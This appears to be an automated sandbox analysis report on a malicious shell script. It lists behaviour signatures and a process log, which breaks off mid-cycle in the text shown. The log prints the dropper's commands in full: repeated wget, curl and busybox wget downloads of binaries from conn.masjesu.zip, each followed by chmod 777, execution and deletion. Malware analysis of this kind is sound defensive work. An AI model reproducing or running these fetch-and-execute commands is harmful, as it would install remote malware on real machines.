Analysis Overview
SHA256
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2
Threat Level: Shows suspicious behavior
The file f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 03:08
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 03:08
Reported
2024-10-18 03:11
Platform
debian9-mipsbe-20240729-en
Max time kernel
138s
Max time network
136s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | N/A |
| N/A | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | N/A |
| N/A | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | N/A |
| N/A | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | N/A |
| N/A | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | N/A |
| N/A | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | N/A |
| N/A | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | N/A |
| N/A | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | N/A |
| N/A | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | N/A |
| N/A | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | N/A |
| N/A | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | N/A |
| N/A | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | N/A |
| N/A | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | N/A |
| N/A | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | N/A |
| N/A | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | N/A |
| N/A | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | N/A |
| N/A | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | N/A |
| N/A | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | N/A |
| N/A | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | N/A |
| N/A | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | N/A |
| N/A | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | N/A |
| N/A | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | N/A |
| N/A | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | N/A |
| N/A | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | N/A |
| N/A | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | N/A |
| N/A | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | N/A |
| N/A | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | N/A |
| N/A | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | /usr/bin/curl | N/A |
Processes
/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/chmod
[chmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL
[./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/rm
[rm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/chmod
[chmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK
[./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/rm
[rm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/chmod
[chmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB
[./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/rm
[rm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/chmod
[chmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I
[./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/rm
[rm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/chmod
[chmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O
[./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/rm
[rm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/chmod
[chmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ
[./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/rm
[rm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/chmod
[chmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S
[./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/rm
[rm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/chmod
[chmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv
[./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/rm
[rm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/chmod
[chmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp
[./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/rm
[rm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/chmod
[chmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4
[./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/rm
[rm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/chmod
[chmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7
[./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/rm
[rm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/chmod
[chmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw
[./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/rm
[rm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/chmod
[chmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn
[./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/rm
[rm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/chmod
[chmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A
[./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/rm
[rm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/chmod
[chmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL
[./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/rm
[rm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/chmod
[chmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK
[./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/rm
[rm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/chmod
[chmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB
[./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/rm
[rm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/chmod
[chmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I
[./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/rm
[rm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/chmod
[chmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O
